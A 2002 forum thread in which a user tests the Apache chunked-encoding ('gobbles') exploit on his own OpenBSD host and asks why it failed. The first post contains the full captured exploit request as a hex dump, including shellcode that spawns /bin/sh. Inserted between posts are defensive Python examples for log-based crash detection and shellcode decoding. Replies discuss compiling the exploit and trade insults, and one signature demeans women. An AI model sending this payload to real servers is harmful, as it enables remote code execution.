
Thread: Apache chunked (gobbles) exploit on OpenBSD 3.1

  1. #1

    Apache chunked (gobbles) exploit on OpenBSD 3.1

    Hey guys, just a simple question for you all. I just recently installed OpenBSD 3.1
    on my home network. I obtained the Apache chunked encoding vulnerability, a.k.a. gobbles,
    from Packetstorm and ran it against my OpenBSD 3.1 host from another node on my small home
    network.

    My attacking host is 192.168.0.1 and my OpenBSD box is 192.168.0.4

    Here is the packet payload just for clarity.

    192.168.0.1:1471 -> 192.168.0.4:80 TCP TTL:128 TOS:0x0 ID:8177 IpLen:20 DgmLen:44 DF
    ******S* Seq: 0x2602714E Ack: 0x0 Win: 0x3EBC TcpLen: 24
    TCP Options (1) => MSS: 1460

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


    192.168.0.4:80 -> 192.168.0.1:1471 TCP TTL:64 TOS:0x0 ID:45605 IpLen:20 DgmLen:44 DF
    ***A**S* Seq: 0x30F6508D Ack: 0x2602714F Win: 0x4470 TcpLen: 24
    TCP Options (1) => MSS: 1460

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


    192.168.0.1:1471 -> 192.168.0.4:80 TCP TTL:128 TOS:0x0 ID:8178 IpLen:20 DgmLen:40 DF
    ***A**** Seq: 0x2602714F Ack: 0x30F6508E Win: 0x3EBC TcpLen: 20

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


    192.168.0.1:1471 -> 192.168.0.4:80 TCP TTL:128 TOS:0x0 ID:8179 IpLen:20 DgmLen:1500 DF
    ***AP*** Seq: 0x2602714F Ack: 0x30F6508E Win: 0x3EBC TcpLen: 20
    47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A GET / HTTP/1.1..
    48 6F 73 74 3A 20 61 70 61 63 68 65 2D 73 63 61 Host: apache-sca
    6C 70 2E 63 0D 0A 58 2D 43 43 43 43 43 43 43 3A lp.c..X-CCCCCCC:
    20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 89 E2 83 EC 10 6A 10 54 52 6A 00 6A 00 B8 1F A.....j.TRj.j...
    00 00 00 CD 80 80 7A 01 02 75 0B 66 81 7A 02 05 ......z..u.f.z..
    BF 75 03 EB 0F 90 FF 44 24 04 81 7C 24 04 00 01 .u.....D$..|$...
    00 00 75 DA C7 44 24 08 00 00 00 00 B8 5A 00 00 ..u..D$......Z..
    00 CD 80 FF 44 24 08 83 7C 24 08 03 75 EE 68 0B ....D$..|$..u.h.
    6F 6B 0B 81 34 24 01 00 00 01 89 E2 6A 04 52 6A ok..4$......j.Rj
    01 6A 00 B8 04 00 00 00 CD 80 68 2F 73 68 00 68 .j........h/sh.h
    2F 62 69 6E 89 E2 31 C0 50 52 89 E1 50 51 52 50 /bin..1.PR..PQRP
    B8 3B 00 00 00 CD 80 CC 0D 0A 58 2D 43 43 43 43 .;........X-CCCC
    43 43 43 3A 20 41 41 41 41 41 41 41 41 41 41 41 CCC: AAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
    41 41 41 41 AAAA

    Now the problem is this. From the information I have gathered, this exploit should work on a default
    install of OpenBSD 3.1, so I'm wondering why the exploit failed. I downloaded OpenBSD 3.1 from
    their FTP server, so perhaps the vulnerability is patched? I also have two other questions:

    1. As you can see, near the end of the packet payload, you can see the shell trying to be executed, but shouldn't it be /bin/sh, not /sh.h/bin? Is that just the way Snort (1.8.6) saw the payload? I guess what I'm saying here is, do I have to edit the shellcode to execute /bin/sh instead of sh.h/bin,
    you know, to "skript kiddie proof" it?

    2. If that's not the case, is the downloadable version of 3.1 patched for this vulnerability?
    It's strange, because OpenBSD's httpd reports segfaults and does indeed crash.


    Here are some of the process listings and Apache error messages from the (vulnerable?) OpenBSD box:


    USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
    root 17756 0.0 0.3 292 216 p0 R+ 7:32PM 0:00.00 ps -aux
    www 32247 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)
    www 29974 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)
    www 25120 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)
    www 10393 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)
    root 1 0.0 0.3 344 204 ?? Is 8:33PM 0:00.04 /sbin/init
    root 11321 0.0 0.6 104 368 ?? Ss 8:34PM 0:00.35 syslogd
    root 31095 0.0 0.4 64 252 ?? Is 8:34PM 0:00.01 portmap
    root 20679 0.0 2.0 1092 1284 ?? Ss 8:34PM 0:05.59 /usr/sbin/httpd
    root 8041 0.0 0.5 52 292 ?? Is 8:34PM 0:00.01 inetd
    root 29048 0.0 1.3 372 824 ?? Is 8:34PM 0:02.75 /usr/sbin/sshd
    root 30762 0.0 0.6 200 376 ?? Is 8:34PM 0:00.29 cron
    root 31491 0.0 0.4 36 252 ?? Is 8:34PM 0:00.00 /usr/sbin/wsmoused YES
    root 256 0.0 0.6 48 412 C0 Is+ 8:34PM 0:00.11 /usr/libexec/getty Pc ttyC0
    root 8241 0.0 0.6 44 408 C2 Is+ 8:34PM 0:00.02 /usr/libexec/getty Pc ttyC2
    root 15543 0.0 0.6 48 412 C3 Is+ 8:34PM 0:00.02 /usr/libexec/getty Pc ttyC3
    root 10110 0.0 0.6 48 412 C5 Is+ 8:34PM 0:00.02 /usr/libexec/getty Pc ttyC5
    kpomeroy 27528 0.0 0.4 376 284 C1 Is+ 11:21AM 0:00.07 -sh (sh)
    root 5192 0.0 1.9 428 1260 ?? S 7:30PM 0:01.87 sshd: root@ttyp0 (sshd)
    root 15257 0.0 0.5 388 300 p0 Ss 7:31PM 0:00.12 -sh (sh)
    www 7017 0.0 1.1 1092 720 ?? R 7:32PM 0:00.07 /usr/sbin/httpd
    www 4903 0.0 0.9 1092 548 ?? S 7:32PM 0:00.06 /usr/sbin/httpd
    www 24768 0.0 0.9 1092 548 ?? S 7:32PM 0:00.07 /usr/sbin/httpd
    www 16385 0.0 0.9 1092 548 ?? S 7:32PM 0:00.08 /usr/sbin/httpd
    www 14030 0.0 0.9 1092 548 ?? S 7:32PM 0:00.08 /usr/sbin/httpd
    www 16972 0.0 0.9 1092 548 ?? S 7:32PM 0:00.09 /usr/sbin/httpd
    www 13920 0.0 0.9 1092 548 ?? S 7:32PM 0:00.09 /usr/sbin/httpd
    www 14357 0.0 0.9 1092 548 ?? S 7:32PM 0:00.10 /usr/sbin/httpd
    www 3627 0.0 0.9 1092 548 ?? S 7:32PM 0:00.11 /usr/sbin/httpd
    www 29871 0.0 0.9 1092 548 ?? S 7:32PM 0:00.11 /usr/sbin/httpd
    www 14280 0.0 0.9 1092 548 ?? S 7:32PM 0:00.12 /usr/sbin/httpd
    www 2937 0.0 0.0 0 0 ?? ZW - 0:00.00 (httpd)

    You can see the crashed (zombie) httpd processes, and also here is the /usr/apache/log/error_log
    and access_log:

    [Thu Oct 17 19:28:17 2002] [notice] child pid 9107 exit signal Segmentation fault (11)
    [Thu Oct 17 19:28:17 2002] [notice] child pid 26116 exit signal Segmentation fault (11)
    [Thu Oct 17 19:28:17 2002] [notice] child pid 6840 exit signal Segmentation fault (11)
    [Thu Oct 17 19:28:17 2002] [notice] child pid 21560 exit signal Segmentation fault (11)
    [Thu Oct 17 19:28:17 2002] [notice] child pid 30550 exit signal Segmentation fault (11)
    [Thu Oct 17 19:28:17 2002] [notice] child pid 7442 exit signal Segmentation fault (11)
    [Thu Oct 17 19:28:17 2002] [notice] child pid 14554 exit signal Segmentation fault (11)

    As you can see, httpd does indeed crash, which leads me to believe that
    the 3.1 that I downloaded via FTP from openbsd.org was not patched. But anyway,
    I could not spawn a shell on my attacking box and I was curious as to why, that's all.

    Regards

    kurt
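    The burst of "child pid N exit signal Segmentation fault (11)" lines in the error_log above is the artifact a defender would alert on: many httpd workers dying in the same second is the crash pattern of a failed memory-corruption attempt. As an added example, not code from the thread or from apache-scalp.c, this Python scans Apache 1.3 error_log lines for segfaulting children and flags bursts; the sample log is constructed from the lines quoted above plus a harmless 404 and one isolated segfault.

```python
import re
from datetime import datetime

# Constructed sample: the error_log lines quoted in the post, plus a harmless
# 404 before them and one isolated segfault later, so there is something to skip.
SAMPLE_ERROR_LOG = """\
[Thu Oct 17 19:27:59 2002] [error] [client 192.168.0.1] File does not exist: /var/www/htdocs/favicon.ico
[Thu Oct 17 19:28:17 2002] [notice] child pid 9107 exit signal Segmentation fault (11)
[Thu Oct 17 19:28:17 2002] [notice] child pid 26116 exit signal Segmentation fault (11)
[Thu Oct 17 19:28:17 2002] [notice] child pid 6840 exit signal Segmentation fault (11)
[Thu Oct 17 19:28:17 2002] [notice] child pid 21560 exit signal Segmentation fault (11)
[Thu Oct 17 19:28:17 2002] [notice] child pid 30550 exit signal Segmentation fault (11)
[Thu Oct 17 19:28:17 2002] [notice] child pid 7442 exit signal Segmentation fault (11)
[Thu Oct 17 19:28:17 2002] [notice] child pid 14554 exit signal Segmentation fault (11)
[Thu Oct 17 19:40:02 2002] [notice] child pid 4242 exit signal Segmentation fault (11)
"""

# Apache 1.3 format: "[timestamp] [notice] child pid N exit signal Segmentation fault (11)"
SEGV_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[notice\] child pid (?P<pid>\d+) "
    r"exit signal Segmentation fault \(11\)$"
)

def segfault_events(log_text):
    """Return [(timestamp, pid), ...] for every child that died with SIGSEGV."""
    events = []
    for line in log_text.splitlines():
        m = SEGV_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
            events.append((ts, int(m.group("pid"))))
    return events

def find_bursts(events, window_seconds=10, threshold=3):
    """Greedy sliding window over sorted events: report (start, count) whenever
    `threshold` or more children segfault within `window_seconds` of the first.
    A single worker crash is noise; a burst like the one above is worth a ticket."""
    events = sorted(events)
    bursts, i = [], 0
    while i < len(events):
        j = i
        while (j + 1 < len(events)
               and (events[j + 1][0] - events[i][0]).total_seconds() <= window_seconds):
            j += 1
        if j - i + 1 >= threshold:
            bursts.append((events[i][0].strftime("%Y-%m-%d %H:%M:%S"), j - i + 1))
            i = j + 1
        else:
            i += 1
    return bursts
```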

  2. #2
    Senior Member. Join Date: Sep 2001. Posts: 1,027
    Well, if you downloaded from the .../OpenBSD/3.1/ dir on the FTP server you should have the plain release of 3.1 (.../OpenBSD/snapshots/, on the other hand, are "in-between releases" of -current).

    As for why the exploit doesn't work (or doesn't seem to), I couldn't say for sure (it's been a while already since the exploit came out...). I haven't played with the exploit myself, but if I remember right, the gobbles exploit didn't do it for everyone: something to do with the default offset... Your best bet would be to search the misc@openbsd.org archives
    (http://www.sigmasoft.com/cgi-bin/wil...ields=filelist)

    Ammo
    Credit travels up, blame travels down -- The Boss

  3. #3
    Junior Member. Join Date: Oct 2002. Posts: 6
    I was wondering if you guys could help me compile the apache-scalp.c code; I am new to coding in Unix. I've attempted "make apache-scalp.c" but obviously more syntax is needed, and I am unfamiliar with Emacs. Can someone please walk me through compiling this code? Thanks

  4. #4
    Senior Member. Join Date: Nov 2001. Posts: 4,785
    *************
    I've attemped the " make apache-scalp.c " but obviously more syntax is needed,
    *************

    And you expect me to think you're more than just a script kiddie, a wannabe at that.
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  5. #5
    the_JinX (Leftie Linux Lover). Join Date: Nov 2001. Location: Beverwijk, Netherlands. Posts: 2,534
    Well, slackwarelinux,

    I agree on it being /bin/sh, so I think somewhere something must have gone wrong.

    But I never tried any of the Packetstorm stuff myself.
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !
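    Question 1 in the first post, and the reply just above, ask whether the "h/sh.h/bin" in Snort's ASCII column means the captured shellcode has the path backwards. As an added example, not code from the thread or from apache-scalp.c, this Python re-parses the two hex-dump rows quoted in the first post and shows that the two push-immediate instructions place "/bin" and "/sh" on the stack in the order a reader of memory would see, so the wire bytes and the stack string differ only in presentation.

```python
import re

# The two Snort hex-dump rows from the capture in post #1, copied as printed there
# (16 hex pairs, then Snort's own ASCII column). Constructed sample for this example.
CAPTURED_ROWS = """\
01 6A 00 B8 04 00 00 00 CD 80 68 2F 73 68 00 68 .j........h/sh.h
2F 62 69 6E 89 E2 31 C0 50 52 89 E1 50 51 52 50 /bin..1.PR..PQRP
"""

# A row is a run of "XX " hex pairs followed by the ASCII column; a full row has
# exactly 16 pairs (hence the cap below), the last row of a dump may have fewer.
ROW_RE = re.compile(r"^((?:[0-9A-Fa-f]{2} )+)(.*)$")

def bytes_from_snort_rows(rows):
    """Recover the raw payload bytes, discarding Snort's ASCII rendering."""
    out = bytearray()
    for line in rows.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            out.extend(int(p, 16) for p in m.group(1).split()[:16])
    return bytes(out)

def snort_ascii(data):
    """Reproduce Snort's ASCII column: printable bytes as-is, everything else '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data)

def pushed_stack_string(code):
    """Collect the 4-byte immediates of every `push imm32` (opcode 0x68) and lay
    them out as the stack holds them: the last push sits at the lowest address,
    so the dwords read back in reverse push order. This is a naive byte scan,
    not a disassembler; it steps over each matched immediate so the 0x68 inside
    "/sh" is not mistaken for a second push."""
    imms, i = [], 0
    while i < len(code):
        if code[i] == 0x68 and i + 5 <= len(code):
            imms.append(bytes(code[i + 1:i + 5]))
            i += 5
        else:
            i += 1
    return b"".join(reversed(imms))
```

    A content signature that looks for "/bin/sh" in Snort's ASCII column misses this payload because the path is split across two 4-byte immediates; match on the decoded bytes, or on the request-level anomaly (oversized headers, malformed chunk sizes), instead.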

  6. #6
    Junior Member. Join Date: Oct 2002. Posts: 6
    gcc -c scalp.c -o ./scalp_run -Fukin A, you guys need to get laid - head over to tommys-bookmarks and cuff one off
    -peace

  7. #7
    the_JinX (Leftie Linux Lover). Join Date: Nov 2001. Location: Beverwijk, Netherlands. Posts: 2,534
    Well thanks for the advice, MDMAZER0. I personally like thehun better,
    and wow, you found out how to compile a C program in the Unix environment (although I wouldn't do it as stated above, but hey, that's just me).

    I've looked into the gobbles and didn't seem to get it to work, but then again, I didn't really try.. Good luck slackwarelinux

  8. #8
    Junior Member. Join Date: Oct 2002. Posts: 6
    Sorry guy - that was directed at Tedob1 - we need less flaming in these forums and more dispersal of knowledge. It's a sad world when one simple question like "how can I do this..." or "I'm new to this... can you help? bla bla bla" will get you tossed in a mix. Should I bow down at your 1500 posts in awe, or your leet hacking skills? Do I claim to be a hacker or a script-kiddie? Neither - rather, I am simply a student asking a simple question, exploring someone else's code in a closed environment for the fun of it or whatever I please. Why don't you think about some of the **** in your obviously troubled mind before it hits the keyboard. Have a nice day.
